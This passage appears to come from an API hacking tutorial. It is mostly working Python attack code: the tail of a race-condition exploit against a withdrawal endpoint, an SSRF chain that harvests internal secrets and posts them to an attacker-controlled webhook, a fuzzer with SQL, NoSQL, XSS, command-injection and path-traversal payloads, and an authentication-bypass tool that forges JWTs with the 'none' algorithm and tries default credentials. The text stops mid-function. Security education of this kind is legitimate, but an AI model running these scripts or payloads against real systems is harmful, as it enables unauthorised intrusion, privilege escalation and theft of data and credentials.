print(f"Successful requests: {success_count}/{num_threads}")
if len(successful_responses) > 1:
print("Potential race condition detected!")
print(f"Got {len(successful_responses)} successful responses")
else:
print("No race condition detected")
return {
'successful_responses': successful_responses,
'all_results': results
}
# Example usage
url = "https://api.example.com/withdraw"
auth_token = "valid_user_token"
payload = {
"amount": 100,
"account_id": "12345",
"destination": "54321"
}
# Try to exploit a potential race condition in a withdrawal API
exploit_race_condition(url, auth_token, payload, num_threads=50)
API Vulnerability Chaining
1. From SSRF to Data Exfiltration
# Python script demonstrating API vulnerability chaining
# Chain: SSRF → Internal API Access → Data Exfiltration
import requests
import json
import base64
def chain_ssrf_to_exfiltration(target_url, webhook_url):
"""
Chain multiple vulnerabilities:
1. Use SSRF to access internal API
2. Retrieve sensitive data
3. Exfiltrate data to external server
"""
print(f"Starting exploitation chain against {target_url}")
# Step 1: Probe for SSRF vulnerability
print("\n[Step 1] Testing for SSRF vulnerability...")
# Try different SSRF payloads
ssrf_payloads = [
f"http://localhost:8080/api/internal/users",
f"http://127.0.0.1:8080/api/internal/users",
f"http://0.0.0.0:8080/api/internal/users",
f"http://internal-api/users",
f"http://10.0.0.1/api/users"
]
ssrf_response = None
successful_payload = None
for payload in ssrf_payloads:
try:
print(f"Trying SSRF payload: {payload}")
# Assuming there's an endpoint that fetches external resources
response = requests.post(
f"{target_url}/api/fetch_resource",
json={"url": payload},
timeout=5
)
# Check if we got a successful response with data
if response.status_code == 200 and "user" in response.text.lower():
print(f"SSRF vulnerability confirmed with payload: {payload}")
ssrf_response = response.json()
successful_payload = payload
break
except Exception as e:
print(f"Error with payload {payload}: {e}")
if not ssrf_response:
print("Failed to exploit SSRF vulnerability")
return False
# Step 2: Enumerate internal API using SSRF
print("\n[Step 2] Enumerating internal API...")
# Extract base internal URL from successful payload
internal_base_url = successful_payload.rsplit('/api/', 1)[0]
# Potential internal endpoints to probe
internal_endpoints = [
"/api/internal/users",
"/api/internal/config",
"/api/internal/keys",
"/api/internal/secrets",
"/api/system/info",
"/api/admin/users",
"/api/v1/internal/database",
"/health",
"/metrics",
"/actuator/env",
"/actuator/health"
]
internal_data = {}
for endpoint in internal_endpoints:
try:
internal_url = f"{internal_base_url}{endpoint}"
print(f"Probing internal endpoint: {internal_url}")
response = requests.post(
f"{target_url}/api/fetch_resource",
json={"url": internal_url},
timeout=5
)
# Store responses that look promising
if response.status_code == 200:
try:
data = response.json()
internal_data[endpoint] = data
print(f"Successfully accessed internal endpoint: {endpoint}")
except:
print(f"Got response but not valid JSON from: {endpoint}")
except Exception as e:
print(f"Error accessing {endpoint}: {e}")
if not internal_data:
print("Failed to gather internal API data")
return False
# Step 3: Extract sensitive information
print("\n[Step 3] Extracting sensitive information...")
# Look for sensitive data patterns in the responses
sensitive_data = {}
patterns = [
"api_key", "key", "secret", "password", "token", "credential",
"admin", "user", "database", "connection", "config"
]
def search_for_sensitive_data(data, path=""):
if isinstance(data, dict):
for key, value in data.items():
new_path = f"{path}.{key}" if path else key
# Check if the key matches sensitive patterns
if any(pattern in key.lower() for pattern in patterns):
sensitive_data[new_path] = value
search_for_sensitive_data(value, new_path)
elif isinstance(data, list):
for i, item in enumerate(data):
new_path = f"{path}[{i}]"
search_for_sensitive_data(item, new_path)
# Process all gathered data
for endpoint, data in internal_data.items():
search_for_sensitive_data(data, endpoint)
if not sensitive_data:
print("No obviously sensitive data found")
else:
print(f"Found {len(sensitive_data)} potentially sensitive data items")
# Step 4: Exfiltrate the data
print("\n[Step 4] Exfiltrating data...")
# Combine all gathered data
exfil_data = {
"ssrf_response": ssrf_response,
"internal_api_data": internal_data,
"sensitive_data": sensitive_data
}
# Encode the data to avoid potential issues
encoded_data = base64.b64encode(json.dumps(exfil_data).encode()).decode()
try:
# Send data to attacker-controlled webhook
exfil_response = requests.post(
webhook_url,
json={"data": encoded_data}
)
if exfil_response.status_code == 200:
print(f"Successfully exfiltrated data to {webhook_url}")
return True
else:
print(f"Failed to exfiltrate data: {exfil_response.status_code}")
return False
except Exception as e:
print(f"Error during data exfiltration: {e}")
return False
# Example usage
target_url = "https://vulnerable-api.example.com"
webhook_url = "https://attacker-controlled-server.com/webhook"
chain_ssrf_to_exfiltration(target_url, webhook_url)
Hands-On Challenge #3: Advanced API Attack Chain
Try This: In a controlled environment with vulnerable applications like DVWA, WebGoat, or Juice Shop:
- Identify and chain together at least three API vulnerabilities (e.g., authentication bypass → IDOR → data extraction)
- Document your methodology
- Implement a basic script to automate the attack chain
Expert Level: Custom Tooling and Zero-Days
At the expert level, we focus on developing custom tools, discovering new vulnerabilities, and building comprehensive testing frameworks.
Building an API Fuzzing Framework
# API Fuzzing Framework for Discovering Zero-Days
import argparse
import random
import string
import json
import time
import sys
import re
import requests
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
class APIFuzzer:
def __init__(self, base_url, auth_token=None, threads=10, delay=0.1, timeout=10, output_file=None, verbose=False):
self.base_url = base_url.rstrip('/')
self.auth_token = auth_token
self.threads = threads
self.delay = delay
self.timeout = timeout
self.output_file = output_file or f"api_fuzzing_results_{int(time.time())}.json"
self.verbose = verbose
self.session = requests.Session()
self.results = []
self.endpoints_discovered = set()
self.parameters_discovered = {}
self.vulnerabilities_found = []
# Initialize headers
self.headers = {}
if auth_token:
self.headers['Authorization'] = f"Bearer {auth_token}"
# Payload libraries
self.sqli_payloads = [
"' OR 1=1--",
"' UNION SELECT 1,2,3--",
"' WAITFOR DELAY '0:0:1'--",
"1; DROP TABLE users--",
"' OR '1'='1",
"1' ORDER BY 10--",
"admin'--"
]
self.nosqli_payloads = [
'{"$gt": ""}',
'{"$ne": null}',
'{"$regex": "^admin"}',
'{"$exists": true}',
'{"$where": "this.password.length > 0"}',
'{"$gt": 0}'
]
self.xss_payloads = [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"javascript:alert(1)",
'"><script>alert(1)</script>',
"';alert(1);//",
"<svg onload=alert(1)>",
"\"><img src=x onerror=alert(1)>"
]
self.command_injection_payloads = [
"; ls -la",
"& whoami",
"| cat /etc/passwd",
"; sleep 5",
"` ping -c 3 127.0.0.1 `",
"$(cat /etc/passwd)",
"'; ping -c 3 127.0.0.1 #"
]
self.path_traversal_payloads = [
"../../../etc/passwd",
"..%2f..%2f..%2fetc%2fpasswd",
"....//....//....//etc//passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"..\\..\\..\\windows\\win.ini",
"file:///etc/passwd",
"/var/www/html/index.php"
]
# HTTP methods to test
self.http_methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD"]
def log(self, message, level="INFO"):
"""Log messages if verbose mode is enabled"""
if self.verbose or level == "ERROR" or level == "CRITICAL":
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"[{timestamp}] [{level}] {message}")
def generate_random_string(self, length=10):
"""Generate a random string for testing"""
return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
def generate_random_number(self, min_val=1, max_val=1000):
"""Generate a random number for testing"""
return random.randint(min_val, max_val)
def generate_random_json(self, fields=None):
"""Generate random JSON data"""
if not fields:
fields = ['name', 'id', 'description', 'value', 'enabled']
data = {}
for field in fields:
# 50% chance of being a string, 30% number, 20% boolean
rand_type = random.random()
if rand_type < 0.5:
data[field] = self.generate_random_string()
elif rand_type < 0.8:
data[field] = self.generate_random_number()
else:
data[field] = random.choice([True, False])
return data
def discover_endpoints(self, wordlist=None):
"""Discover API endpoints using a wordlist"""
self.log("Starting endpoint discovery...")
# Default mini wordlist if none provided
if not wordlist:
wordlist = [
'users', 'admin', 'products', 'orders', 'items', 'customers',
'login', 'logout', 'register', 'auth', 'token', 'api', 'v1', 'v2',
'data', 'info', 'profile', 'settings', 'config', 'system', 'health',
'status', 'metrics', 'stats', 'reports', 'dashboard', 'uploads',
'files', 'images', 'documents', 'payments', 'billing', 'subscriptions',
'comments', 'reviews', 'ratings', 'favorites', 'cart', 'checkout',
'search', 'query', 'filter', 'sort', 'page', 'limit', 'internal'
]
# Add common API path components
api_prefixes = ['api', 'apis', 'api/v1', 'api/v2', 'api/v3', 'v1', 'v2', 'rest', 'graphql', 'service']
# Generate extended paths
paths_to_check = []
# Add base wordlist items
paths_to_check.extend(wordlist)
# Add items with API prefixes
for prefix in api_prefixes:
for word in wordlist:
paths_to_check.append(f"{prefix}/{word}")
# Add common nested paths
for word1 in wordlist[:20]: # Limit to avoid too many combinations
for word2 in wordlist[:20]:
paths_to_check.append(f"{word1}/{word2}")
# Add some common IDs to resources
for word in wordlist[:10]:
paths_to_check.append(f"{word}/1")
paths_to_check.append(f"{word}/admin")
paths_to_check.append(f"{word}/test")
self.log(f"Generated {len(paths_to_check)} paths to check")
# Use ThreadPoolExecutor to parallelize requests
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.check_endpoint, paths_to_check)
self.log(f"Endpoint discovery complete. Found {len(self.endpoints_discovered)} endpoints")
return self.endpoints_discovered
def check_endpoint(self, path):
"""Check if an endpoint exists"""
url = f"{self.base_url}/{path}"
for method in ["GET", "POST", "HEAD"]: # Limit to common methods for discovery
try:
# Make request with appropriate method
if method == "GET" or method == "HEAD":
response = self.session.request(
method,
url,
headers=self.headers,
timeout=self.timeout
)
else:
# For POST, send minimal JSON data
response = self.session.request(
method,
url,
headers={**self.headers, 'Content-Type': 'application/json'},
json={},
timeout=self.timeout
)
# Check for "successful" responses (including 400's which indicate the endpoint exists but needs correct params)
if response.status_code < 500:
self.endpoints_discovered.add(path)
self.log(f"Discovered endpoint: {method} {path} (Status: {response.status_code})")
# Try to determine parameters from response
self.analyze_response_for_parameters(path, response)
# Small delay to be polite
time.sleep(self.delay)
except Exception as e:
if self.verbose:
self.log(f"Error checking {method} {path}: {str(e)}", "ERROR")
def analyze_response_for_parameters(self, path, response):
"""Analyze response to discover potential parameters"""
try:
# Check if response is JSON
if 'application/json' in response.headers.get('Content-Type', ''):
data = response.json()
# Extract potential parameters from response
if isinstance(data, dict):
# Add discovered parameters to our dictionary
self.parameters_discovered[path] = list(data.keys())
# Look for arrays of objects which may indicate resource structure
elif isinstance(data, list) and data and isinstance(data[0], dict):
self.parameters_discovered[path] = list(data[0].keys())
except Exception:
# Not JSON or couldn't parse, check for error messages that might reveal parameters
if 'parameter' in response.text.lower() or 'field' in response.text.lower():
# Simple regex to find parameter names in error messages
param_matches = re.findall(r'parameter [\'"]([A-Za-z0-9_]+)[\'"]', response.text)
param_matches += re.findall(r'field [\'"]([A-Za-z0-9_]+)[\'"]', response.text)
if param_matches:
self.parameters_discovered[path] = param_matches
def fuzz_endpoint(self, path, methods=None, parameters=None):
"""Fuzz a specific endpoint with payloads"""
if not methods:
methods = self.http_methods
if not parameters:
# Use discovered parameters or some defaults
parameters = self.parameters_discovered.get(path, ['id', 'name', 'user_id', 'query', 'search', 'filter', 'sort', 'page', 'limit'])
self.log(f"Fuzzing endpoint: {path} with methods {methods} and parameters {parameters}")
# Prepare payload categories with vulnerability types
payload_categories = [
{"name": "SQL Injection", "payloads": self.sqli_payloads},
{"name": "NoSQL Injection", "payloads": self.nosqli_payloads},
{"name": "XSS", "payloads": self.xss_payloads},
{"name": "Command Injection", "payloads": self.command_injection_payloads},
{"name": "Path Traversal", "payloads": self.path_traversal_payloads}
]
# Test each method
for method in methods:
# For each parameter
for param in parameters:
# Test with random valid data first (baseline)
baseline_response = self.test_parameter(path, method, param, self.generate_random_string())
if not baseline_response:
continue
# Now test with each payload category
for category in payload_categories:
for payload in category["payloads"]:
vulnerability = self.test_parameter(
path,
method,
param,
payload,
vulnerability_type=category["name"],
baseline=baseline_response
)
if vulnerability:
self.log(f"Potential {category['name']} vulnerability found in {method} {path}, parameter {param}", "CRITICAL")
self.vulnerabilities_found.append(vulnerability)
# Small delay to be polite
time.sleep(self.delay)
def test_parameter(self, path, method, param, value, vulnerability_type=None, baseline=None):
"""Test a specific parameter with a value"""
url = f"{self.base_url}/{path}"
try:
# Prepare data based on the method
if method in ["GET", "DELETE", "HEAD"]:
kwargs = {"params": {param: value}}
else:
# For POST, PUT, PATCH
kwargs = {"json": {param: value}}
# Add headers
kwargs["headers"] = self.headers.copy()
if method in ["POST", "PUT", "PATCH"]:
kwargs["headers"]["Content-Type"] = "application/json"
# Send the request
response = self.session.request(method, url, **kwargs, timeout=self.timeout)
# Record the result
result = {
"path": path,
"method": method,
"parameter": param,
"value": value,
"status_code": response.status_code,
"response_time": response.elapsed.total_seconds(),
"response_length": len(response.text),
"timestamp": datetime.now().isoformat()
}
# Determine if this might be a vulnerability
vulnerability = None
if vulnerability_type and baseline:
# Look for indicators of vulnerability based on type
if self.detect_vulnerability(vulnerability_type, response, baseline, value):
vulnerability = {
**result,
"vulnerability_type": vulnerability_type,
"confidence": "medium", # Initial confidence level
"baseline_status": baseline.get("status_code"),
"baseline_length": baseline.get("response_length")
}
# Add to results
self.results.append(result)
return vulnerability or result
except Exception as e:
self.log(f"Error testing {method} {path} parameter {param}: {str(e)}", "ERROR")
return None
def detect_vulnerability(self, vuln_type, response, baseline, payload):
"""Detect if a response indicates a potential vulnerability"""
# Compare with baseline response
baseline_status = baseline.get("status_code")
baseline_length = baseline.get("response_length", 0)
response_length = len(response.text)
# Check for significant response differences
status_changed = response.status_code != baseline_status
length_diff = abs(response_length - baseline_length)
length_percentage = (length_diff / baseline_length * 100) if baseline_length > 0 else 0
# Look for specific vulnerability indicators
indicators = {
"SQL Injection": [
# Error messages
"sql syntax", "mysql error", "postgresql error", "sqlite error", "ora-", "sql server",
# Data leakage
"query failed", "syntax error", "unclosed quotation mark", "unterminated string",
# Successful exploitation signs (data differences)
# Status code differences
length_percentage > 30 and status_changed
],
"NoSQL Injection": [
# Error messages
"mongodb", "bson", "mongo", "mongoose",
# Data leakage
"database error", "cursor", "$where", "$ne",
# Status or data differences
length_percentage > 25 or status_changed
],
"XSS": [
# Response reflecting the payload
payload in response.text,
# Minimal encoding
payload.replace("<", "<").replace(">", ">") in response.text,
# Script execution indicators
"<script>" in response.text and payload in response.text
],
"Command Injection": [
# Output of commands in response
"root:" in response.text and "/bin/" in response.text, # passwd file
"Directory of" in response.text and "Volume" in response.text, # Windows dir
"uid=" in response.text and "gid=" in response.text, # whoami
# Timing indicators
response.elapsed.total_seconds() > baseline.get("response_time", 0) + 1 and "sleep" in payload
],
"Path Traversal": [
# File contents in response
"root:" in response.text and ":/bin/" in response.text, # passwd file
"[boot loader]" in response.text, # win.ini
"# php configuration" in response.text.lower(), # php.ini
# Directory listing
"<dir>" in response.text.lower() and "directory" in response.text.lower(),
# Status or length changes indicating success
(status_changed and length_percentage > 50) or (response.status_code == 200 and baseline_status != 200)
]
}
# Check for indicators specific to this vulnerability type
vuln_indicators = indicators.get(vuln_type, [])
for indicator in vuln_indicators:
if isinstance(indicator, bool) and indicator:
return True
elif isinstance(indicator, str) and indicator.lower() in response.text.lower():
return True
return False
def run_full_scan(self):
"""Run a complete scan process"""
self.log("Starting API security scan")
# 1. Discover endpoints
self.discover_endpoints()
# 2. Fuzz discovered endpoints
for endpoint in self.endpoints_discovered:
self.fuzz_endpoint(endpoint)
# 3. Save results
self.save_results()
# 4. Print summary
self.print_summary()
def save_results(self):
"""Save scan results to a file"""
output = {
"scan_info": {
"base_url": self.base_url,
"timestamp": datetime.now().isoformat(),
"endpoints_discovered": list(self.endpoints_discovered),
"parameters_discovered": self.parameters_discovered,
"vulnerabilities_found": self.vulnerabilities_found,
"total_requests": len(self.results)
},
"detailed_results": self.results
}
with open(self.output_file, 'w') as f:
json.dump(output, f, indent=2)
self.log(f"Results saved to {self.output_file}")
def print_summary(self):
"""Print a summary of findings"""
print("\n" + "="*60)
print(f"API SECURITY SCAN SUMMARY FOR {self.base_url}")
print("="*60)
print(f"\nEndpoints Discovered: {len(self.endpoints_discovered)}")
for endpoint in sorted(self.endpoints_discovered):
print(f" - {endpoint}")
print(f"\nPotential Vulnerabilities: {len(self.vulnerabilities_found)}")
vuln_types = {}
for vuln in self.vulnerabilities_found:
vuln_type = vuln.get('vulnerability_type', 'Unknown')
vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
for vuln_type, count in vuln_types.items():
print(f" - {vuln_type}: {count}")
print(f"\nTotal Requests Sent: {len(self.results)}")
print(f"Full results saved to: {self.output_file}")
print("="*60 + "\n")
# Main function
def main():
parser = argparse.ArgumentParser(description="API Security Testing Framework")
parser.add_argument("url", help="Base URL of the API to test")
parser.add_argument("-t", "--token", help="Authorization token")
parser.add_argument("-w", "--wordlist", help="Path to endpoint wordlist file")
parser.add_argument("-o", "--output", help="Output file for results")
parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests in seconds")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
# Load wordlist if provided
wordlist = None
if args.wordlist:
try:
with open(args.wordlist, 'r') as f:
wordlist = [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"Error loading wordlist: {e}")
sys.exit(1)
# Create and run the fuzzer
fuzzer = APIFuzzer(
base_url=args.url,
auth_token=args.token,
threads=args.concurrency,
delay=args.delay,
output_file=args.output,
verbose=args.verbose
)
fuzzer.run_full_scan()
if __name__ == "__main__":
main()
Advanced API Authentication Bypass Framework
# API Authentication Bypass Framework
import jwt
import base64
import json
import hashlib
import hmac
import requests
import argparse
import sys
import time
import random
from concurrent.futures import ThreadPoolExecutor
class APIAuthBypass:
def __init__(self, target_url, output_file=None, threads=5, verbose=False):
self.target_url = target_url
self.output_file = output_file or f"auth_bypass_results_{int(time.time())}.json"
self.threads = threads
self.verbose = verbose
self.session = requests.Session()
self.results = []
self.successful_bypasses = []
# Default headers
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json',
'Content-Type': 'application/json'
}
def log(self, message, level="INFO"):
"""Log messages if verbose mode is enabled"""
if self.verbose or level == "ERROR" or level == "CRITICAL":
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print(f"[{timestamp}] [{level}] {message}")
def test_no_auth(self, endpoint):
"""Test if endpoint works without authentication"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing endpoint without auth: {url}")
try:
response = self.session.get(url, headers=self.headers, timeout=10)
result = {
"test_type": "no_auth",
"endpoint": endpoint,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"NO AUTH BYPASS: Endpoint {endpoint} accessible without authentication!", "CRITICAL")
self.successful_bypasses.append(result)
return result
except Exception as e:
self.log(f"Error testing no auth on {endpoint}: {str(e)}", "ERROR")
return None
def test_header_variations(self, endpoint, token=None):
"""Test various header permutations for auth bypass"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing header variations on: {url}")
# Header variations to test
variations = [
# Common auth header variations
{"Authorization": ""},
{"Auth": "true"},
{"Authentication": "1"},
{"X-API-Key": ""},
{"api-key": ""},
{"apikey": ""},
{"x-api-token": ""},
# Case sensitivity tests
{"AUTHORIZATION": f"Bearer {token}" if token else ""},
{"authorization": f"bearer {token}" if token else ""},
# Common default/test credentials
{"Authorization": "Bearer test"},
{"Authorization": "Bearer admin"},
{"Authorization": "Bearer 1234567890"},
{"X-API-Key": "test"},
{"X-API-Key": "admin"},
{"X-API-Key": "1234567890"},
# Basic Auth variations
{"Authorization": "Basic YWRtaW46YWRtaW4="}, # admin:admin
{"Authorization": "Basic YWRtaW46cGFzc3dvcmQ="}, # admin:password
{"Authorization": "Basic dGVzdDp0ZXN0"}, # test:test
{"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}, # guest:guest
# Authorization header removal test
{}
]
for header_variation in variations:
try:
# Use custom headers for this request
test_headers = self.headers.copy()
# Remove any existing auth headers
auth_headers = ["Authorization", "X-API-Key", "api-key", "apikey", "Auth", "Authentication"]
for auth_header in auth_headers:
if auth_header in test_headers:
del test_headers[auth_header]
# Add the test variation
test_headers.update(header_variation)
response = self.session.get(url, headers=test_headers, timeout=10)
result = {
"test_type": "header_variation",
"endpoint": endpoint,
"variation": header_variation,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"HEADER BYPASS: Endpoint {endpoint} accessible with header variation: {header_variation}", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing header variation {header_variation} on {endpoint}: {str(e)}", "ERROR")
def test_jwt_vulnerabilities(self, endpoint, valid_token=None):
"""Test for JWT-related vulnerabilities"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing JWT vulnerabilities on: {url}")
# If we don't have a valid token, try to create some test tokens
if not valid_token:
test_tokens = [
self._create_test_jwt({"user_id": 1, "role": "admin"}),
self._create_test_jwt({"user_id": 1, "role": "user"}),
self._create_test_jwt({"admin": True})
]
else:
# Parse the provided token to create test variations
try:
token_parts = valid_token.split('.')
if len(token_parts) == 3:
payload = json.loads(base64.b64decode(token_parts[1] + "==").decode('utf-8'))
# Create variations based on the real token
test_tokens = [valid_token] # Start with the valid token
# Try to elevate privileges in the payload
modified_payload = payload.copy()
# Look for role/permission fields to modify
privilege_fields = ['role', 'roles', 'permissions', 'isAdmin', 'is_admin', 'admin', 'scope']
for field in privilege_fields:
if field in modified_payload:
if isinstance(modified_payload[field], str):
modified_payload[field] = "admin"
elif isinstance(modified_payload[field], list):
modified_payload[field].append("admin")
elif isinstance(modified_payload[field], bool):
modified_payload[field] = True
# Add admin if not present
if 'role' not in modified_payload:
modified_payload['role'] = "admin"
if 'admin' not in modified_payload:
modified_payload['admin'] = True
# Create token with modified payload but same header/signature
modified_payload_b64 = base64.b64encode(
json.dumps(modified_payload).encode()
).decode().rstrip('=')
modified_token = f"{token_parts[0]}.{modified_payload_b64}.{token_parts[2]}"
test_tokens.append(modified_token)
# Try 'none' algorithm attack
none_header = {"alg": "none", "typ": "JWT"}
none_header_b64 = base64.b64encode(
json.dumps(none_header).encode()
).decode().rstrip('=')
none_token = f"{none_header_b64}.{token_parts[1]}."
test_tokens.append(none_token)
# Same with modified payload
none_token_admin = f"{none_header_b64}.{modified_payload_b64}."
test_tokens.append(none_token_admin)
else:
# Not a valid JWT, just use our test tokens
test_tokens = [
self._create_test_jwt({"user_id": 1, "role": "admin"}),
self._create_test_jwt({"user_id": 1, "role": "user", "exp": int(time.time()) + 3600}),
self._create_test_jwt({"admin": True})
]
except Exception as e:
self.log(f"Error parsing valid token: {str(e)}", "ERROR")
test_tokens = [
self._create_test_jwt({"user_id": 1, "role": "admin"}),
self._create_test_jwt({"user_id": 1, "role": "user"}),
self._create_test_jwt({"admin": True})
]
# Test each token
for token in test_tokens:
try:
test_headers = self.headers.copy()
test_headers["Authorization"] = f"Bearer {token}"
response = self.session.get(url, headers=test_headers, timeout=10)
result = {
"test_type": "jwt_vulnerability",
"endpoint": endpoint,
"token": token,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"JWT BYPASS: Endpoint {endpoint} accessible with modified JWT: {token[:20]}...", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing JWT {token[:20]}... on {endpoint}: {str(e)}", "ERROR")
def test_oauth_vulnerabilities(self, endpoint):
"""Test for OAuth-related vulnerabilities"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing OAuth vulnerabilities on: {url}")
# Common OAuth parameters to test
oauth_params = [
{"access_token": "EXAMPLE_TOKEN"},
{"code": "EXAMPLE_CODE"},
{"id_token": "EXAMPLE_ID_TOKEN"},
{"token": "EXAMPLE_TOKEN"},
{"oauth_token": "EXAMPLE_OAUTH_TOKEN"}
]
for params in oauth_params:
try:
response = self.session.get(url, headers=self.headers, params=params, timeout=10)
result = {
"test_type": "oauth_vulnerability",
"endpoint": endpoint,
"params": params,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"OAUTH BYPASS: Endpoint {endpoint} accessible with OAuth params: {params}", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing OAuth params {params} on {endpoint}: {str(e)}", "ERROR")
def test_api_key_bypasses(self, endpoint):
"""Test for API key bypass techniques"""
url = f"{self.target_url}/{endpoint}"
self.log(f"Testing API key bypasses on: {url}")
# API key locations to test
locations = [
# Headers
{"type": "header", "name": "X-API-Key", "value": "test_key"},
{"type": "header", "name": "api-key", "value": "test_key"},
{"type": "header", "name": "apikey", "value": "test_key"},
{"type": "header", "name": "x-api-token", "value": "test_key"},
# URL parameters
{"type": "param", "name": "api_key", "value": "test_key"},
{"type": "param", "name": "apikey", "value": "test_key"},
{"type": "param", "name": "key", "value": "test_key"},
{"type": "param", "name": "api_token", "value": "test_key"},
# Common test values
{"type": "header", "name": "X-API-Key", "value": "1234567890"},
{"type": "header", "name": "X-API-Key", "value": "admin"},
{"type": "header", "name": "X-API-Key", "value": "test"},
{"type": "param", "name": "api_key", "value": "1234567890"},
{"type": "param", "name": "api_key", "value": "admin"},
{"type": "param", "name": "api_key", "value": "test"}
]
for location in locations:
try:
test_headers = self.headers.copy()
params = {}
if location["type"] == "header":
test_headers[location["name"]] = location["value"]
else: # param
params[location["name"]] = location["value"]
response = self.session.get(url, headers=test_headers, params=params, timeout=10)
result = {
"test_type": "api_key_bypass",
"endpoint": endpoint,
"location": location,
"status_code": response.status_code,
"response_length": len(response.text),
"success": self._is_successful_response(response)
}
self.results.append(result)
if result["success"]:
self.log(f"API KEY BYPASS: Endpoint {endpoint} accessible with API key in {location['type']} {location['name']}: {location['value']}", "CRITICAL")
self.successful_bypasses.append(result)
# Small delay
time.sleep(0.5)
except Exception as e:
self.log(f"Error testing API key in {location['type']} {location['name']} on {endpoint}: {str(e)}", "ERROR")
def _create_test_jwt(self, payload, algorithm="HS256"):
"""Create a test JWT token with the specified payload"""
# Add common JWT claims if not present
if "iat" not in payload:
payload["iat"] = int(time.time())
if "exp" not in payload:
payload["exp"] = int(time.time()) + 3600 # 1 hour
if "jti" not in payload:
payload["jti"] = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=10))
# Create the JWT
token = jwt.encode(payload, "test_secret", algorithm=algorithm)
# Handle different JWT library versions
if isinstance(token, bytes):
return token.decode('utf-8')
return token
def _is_successful_response(self, response):
"""Determine if a response indicates successful access"""
# Check status code (2xx is usually success)
if 200 <= response.status_code < 300:
return True
# Check for common error messages or patterns in responses
# that would indicate that auth failed
error_indicators = [
"not authorized",
"unauthorized",
"forbidden",
"access denied",
"authentication required",
"invalid token",
"invalid api key",
"permission denied"
]
for indicator in error_indicators:
if indicator in response.text.lower():
return False
# If it's a 4xx code, it might be auth failure, but let's check
# If there's actual data in the response that seems like real content
if 400 <= response.status_code < 500:
content_indicators = ["data", "user", "id", "name", "result", "success"]
try:
# If it's JSON, check for data structure
json_data = response.json()
# If it has "data" or "results" keys, it might be valid content
for key in json_data:
if key.lower() in content_indicators:
if json_data[key] is not None and json_data[key] != "" and json_data[key] != []:
return True
# No evidence of real content, probably auth failure
return False
except:
# Not JSON, check text content
if len(response.text) > 100: # Arbitrary threshold
# If response is HTML, look for common tags indicating content
if "<html" in response.text.lower():
if "<table" in response.text.lower() or "<div" in response.text.lower():
return True
# No evidence of real content, probably auth failure
return False
return False
def scan_endpoints(self, endpoints, valid_token=None):
"""Run all tests on the specified endpoints"""
self.log(f"Starting scan on {len(endpoints)} endpoints")
for endpoint in endpoints:
self.log(f"\nTesting endpoint: {endpoint}")
# Run all tests sequentially for each endpoint
self.test_no_auth(endpoint)
self.test_header_variations(endpoint, valid_token)
self.test_jwt_vulnerabilities(endpoint, valid_token)
self.test_oauth_vulnerabilities(endpoint)
self.test_api_key_bypasses(endpoint)
self.log(f"\nScan completed. Found {len(self.successful_bypasses)} potential bypasses.")
self.save_results()
def scan_with_threading(self, endpoints, valid_token=None):
"""Run tests with threading for faster scanning"""
self.log(f"Starting threaded scan on {len(endpoints)} endpoints with {self.threads} threads")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
for endpoint in endpoints:
executor.submit(self.test_no_auth, endpoint)
executor.submit(self.test_header_variations, endpoint, valid_token)
executor.submit(self.test_jwt_vulnerabilities, endpoint, valid_token)
executor.submit(self.test_oauth_vulnerabilities, endpoint)
executor.submit(self.test_api_key_bypasses, endpoint)
self.log(f"\nThreaded scan completed. Found {len(self.successful_bypasses)} potential bypasses.")
self.save_results()
def save_results(self):
"""Save scan results to a file"""
output = {
"scan_info": {
"target_url": self.target_url,
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"total_tests": len(self.results),
"successful_bypasses": len(self.successful_bypasses)
},
"successful_bypasses": self.successful_bypasses,
"all_results": self.results
}
with open(self.output_file, 'w') as f:
json.dump(output, f, indent=2)
self.log(f"Results saved to {self.output_file}")
def print_summary(self):
"""Print a summary of findings"""
print("\n" + "="*60)
print(f"API AUTHENTICATION BYPASS SUMMARY FOR {self.target_url}")
print("="*60)
if not self.successful_bypasses:
print("\nNo successful bypass techniques found.")
else:
print(f"\nSuccessful Bypasses: {len(self.successful_bypasses)}")
# Group by test type
bypass_types = {}
for bypass in self.successful_bypasses:
test_type = bypass.get('test_type', 'Unknown')
if test_type not in bypass_types:
bypass_types[test_type] = []
bypass_types[test_type].append(bypass)
# Print by type
for test_type, bypasses in bypass_types.items():
